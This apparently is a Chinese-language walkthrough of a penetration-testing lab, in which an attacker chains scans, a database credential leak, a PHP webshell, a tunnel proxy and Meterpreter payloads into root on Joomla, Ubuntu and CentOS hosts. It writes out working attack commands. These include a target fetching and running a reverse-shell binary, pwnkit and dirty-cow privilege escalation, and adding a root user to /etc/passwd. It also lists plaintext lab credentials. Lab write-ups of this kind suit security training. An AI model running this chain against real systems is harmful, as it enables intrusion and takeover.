信息收集
1. ## kali--nmap扫描存活IP,经访问主页确定目标IP地址为192.168.52.162
1. ### 操作流程
- #### nmap扫描存活IP-->根据IP和开放的端口服务确定目标主机-->访问目标网页确定环境正常
- | | |
| ------------------------ | --------------- |
| nmap -Sp 192.168.52.0/24 | nmap使用tcp扫描存活IP |
编辑
编辑
编辑
2. ## 信息收集---dirb后台扫描和Acunetix漏扫以及数据库操作
1. ### 操作流程
- #### dirb后台扫描(得到后台登录页面)--》Acunetix漏扫(得到数据库账号密码)--》Navicat连接数据库(寻找相关用户表,得到账号密码,因为数据库密码加密,将密码密文替换成自己已知的密码密文)
<!---->
- | | |
| --------------------------------------------------------------------------------- | -------- |
| dirb -u [http://192.168.52.162/](http://192.168.52.162/ "http://192.168.52.162/") | dirb后台扫描 |
3. ##### 扫描得到后台管理登录页面
1. ##### Acunetix漏扫爆出数据库账号密码
2. ##### Navicat连接数据库--替换密码密文
![]( "点击并拖拽以移动")
4. ##### 登录数据库后将am2zu_users表中的管理员密码信息替换,更改为123456,再利用扫描的管理员后台登录页面进行登录,成功
4. ## 信息收集--web网页页面信息修改
1. ### 操作流程
- #### 利用数据库的账号密码尝试登录到后台管理页面--》逐个查看web页面发现可修改index.php页面内容--》index.php写入一句话木马--中国蚁剑连接
<!---->
- | | | |
| ------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------ | --------------- |
| MySQL | 5.7.27 | mysql版本号 |
| ubuntu | 0.16.04.1 | 操作系统版本 |
| nginx | 1.9.4 | 代理版本 |
| Apache | /2.4.18 (Ubuntu) Server | |
| **Joomla! Version** | Joomla! 3.9.12 Stable [ Amani ] 24-September-2019 15:00 GMT | |
| 22/tcp | open ssh | 端口 |
| 80/tcp | open http | 端口 |
| 3306/tcp | open mysql | 端口 |
| [http://192.168.52.162/administrator/](http://192.168.52.162/administrator/ "http://192.168.52.162/administrator/") | | admin后台登录页面 |
| testuser | | centos-跳板机数据库账号 |
| cvcvgjASD!@ | | centos-跳板机数据库密码 |
2. #### php信息收集--发现disable_functions禁用函数模块(蚁剑链接时需使用插件绕过)
3. ### 后台登录页面,修改PHP文件,写入一句话木马,使用中国蚁剑连接
- | | |
| -------- | ----------------- |
| getcwd() | #php函数,可查看当前文件路径 |
二. # getshell操作
1. ## 中国蚁剑操作--(使用disable_functions插件绕过php的disable_functions模块禁用的函数)
1. ### 操作流程:
- #### 蚁剑链接一句话木马文件--》使用插件绕过禁用函数出现可用bash窗口
<!---->
- 
-
-
使用绕过插件生成的php文件重新连接打开bash窗口
2. ## 使用Neo-reGeorg开启web代理
1. ### 操作流程:
- kalI使用Neo-reGeorg生成隧道木马php--》kali使用Neo-reGeorg开启隧道代理--》蚁剑上传隧道木马tunnel.php--》kali网页访问tunnel.php页面出现正常空白页面(kali火狐浏览器开启代理)
- 由于centos即192.168.52.162这台跳板机是反向代理的ubintu,kali无法直接去内网通信,没有方法提权,所以需要借助代理访问内网
<!---->
- | | |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | ---------------------- |
| wget [GitHub - L-codes/Neo-reGeorg: Neo-reGeorg is a project that seeks to aggressively refactor reGeorg](https://github.com/L-codes/Neo-reGeorg "GitHub - L-codes/Neo-reGeorg: Neo-reGeorg is a project that seeks to aggressively refactor reGeorg") | kali下载Neo-reGeorg |
| python3 neoreg.py generate -k 123456 | 利用文件夹里的neoreg.py文件生成木马 |
| python3 neoreg.py -k 123456 -u [http://192.168.52.162/tunnel.php](http://192.168.52.162/tunnel.php "http://192.168.52.162/tunnel.php") | kali使用neo-georg开启代理 |
-
-
编辑
编辑
2. ## msf操作--ubuntu提权
1. ### 操作流程
- kali生成正向连接shell木马并上传到ubuntu--》kali进入msf开启全局代理、监听--》Ubuntu对shell木马文件赋予执行权限并执行上线msf--》kali在msf中使用后渗透模块扫描漏洞--》使用优先级高的漏洞提权成功--》在ubuntu的/root/mysql/test.txt文件中发现账号密码疑似连接centos信息
<!---->
- | | |
| ----------------------------------------------------------------------------------------------------- | --------------------- |
| msfvenom -p linux/x64/meterpreter/bind_tcp RHOST=192.168.93.120 LPORT=5656 -e elf -o msf_bind_tcp.elf | kali 生成正向连接木马127.0.0. |
| setg proxies socks5:127.0.0.1:1080 | msf设置全局代理 |
| use post/multi/recon/local_exploit_suggester | |
| use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec | 提权 |
3. ## kali开启proxychains代理,访问centos
1. ### 操作流程:
- kali配置proxychains代理配置文件--》使用代理加ssh命令连接centos成功(ubuntu发现的账号密码连接)
<!---->
- | | |
| ------------------------------------------------------------------- | ------------------ |
| socks5 127.0.0.1 1080 | |
| python -c'import pty;pty.spawn("/bin/bash")' | |
| echo "test:advwtv/9yU5yQ:0:0:,,,:/root:/bin/bash" >>/etc/passwd | |
| ┌──(root㉿kali-3)-[~/.ssh]└─# proxychains ssh test@192.168.93.120 | 密码:password@123 |
| ssh wwwuser@192.168.93.100 | 密码:wwwuser_123Aqx |
4. ## centos跳板机操作-入侵提权
1. ### 操作流程:
- kali生成反向shell木马文件并且上传centos--》kali使用msf开启监听--》centos对shell木马赋权执行上线msf--》kali使用后渗透模块扫描centos漏洞--》尝试列出的漏洞均失败--》发现centos主机本地存在dirty疑似漏洞利用文件,执行dirty文件成功生成新的账号密码--》切换到新的账号密码成功提权
1. | | |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | ----------------------- |
| ┌──(root㉿kali-3)-[/secure22]└─# msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=192.168.52.151 lport=6767 -f elf > msf_rev_tcp2.elf | 生成木马 |
| ┌──(root㉿kali-3)-[/secure22]└─# python -m http.server | kali开启http服务 |
| [wwwuser@localhost ~]$ wget [http://192.168.52.151:8000/msf_rev_tcp2.elf](http://192.168.52.151:8000/msf_rev_tcp2.elf "http://192.168.52.151:8000/msf_rev_tcp2.elf") | centos下载反弹shell木马 |
| [wwwuser@localhost ~]$ chmod +x msf_rev_tcp2.elf | 授予执行权限 |
| [wwwuser@localhost ~]$ ./msf_rev_tcp2.elf | centos执行反弹木马 |
| msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester | 上线msf 使用msf后渗透模块本地漏洞扫描 |
| [wwwuser@localhost ~]$ ./dirty | 执行提权文件 |
| [wwwuser@localhost ~]$ ssh firefart@192.168.93.100 | 密码:123456 |
#创作者训练营
